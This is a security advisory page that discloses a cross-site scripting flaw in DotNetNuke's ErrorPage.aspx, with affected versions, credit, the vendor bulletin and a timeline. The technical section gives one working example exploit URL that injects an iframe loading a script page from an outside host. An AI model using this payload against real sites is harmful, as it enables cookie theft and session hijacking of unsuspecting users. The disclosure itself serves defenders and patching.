SecuriTeam - DotNetNuke ErrorPage.aspx Cross-Site Scripting Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitise user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Credit:
The information has been provided by Ben Hawkes.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* DotNetNuke version 4.9.3 and prior

Immune Systems:
* DotNetNuke version 4.9.4 and later

The issue occurs due to DotNetNuke not correctly sanitising iframes closed with an open-bracket. The following URL contains an example exploit: http://<site>/ErrorPage.aspx?status=500&error=test%3Ciframe%20src=%22http://www.lateralsecurity.com/XSS.html%22%3C

Vendor Status:
DotNetNuke's bulletin regarding this issue can be found here:
http://www.dotnetnuke.com/News/SecurityPolicy/securitybulletinno27/tabid/1276/Default.aspx

Disclosure Timeline:
30th April 2009 Reported
22nd May 2009 Published

	Publique! CMS and SQL Injection Vulnerabilities
	Files2Links F2L-3000 SQL Injection Vulnerability
	HP-UX Running Apache Data Injection and DoS Vulnerability
	MIT krb5 KDC denial of service in cross-realm referral processing
	AproxEngine Multiple Vulnerabilities
	APC Switched Rack PDU XSS Vulnerability
	HP-UX Running OpenSSL Unauthorized Data Injection and Denial of Service
	HP OpenView NNM snmpviewer.exe CGI Host Header Stack Overflow Vulnerability
	HP OpenView NNM ovwebsnmpsrv.exe OVwSelection Stack Overflow Vulnerability
	HP-UX Running VRTSweb Remote Execution of Arbitrary Code and Privilege Escalation
	FreeBSD SSL and TLS Session Renegotiation vulnerability
	CoreHTTP Web Server Buffer Overflow Vulnerability
	HP OpenView Network Node Manager DoS Vulnerability
	ToutVirtual VirtualIQ Multiple Vulnerabilities
	Transport Layer Security Renegotiation Vulnerability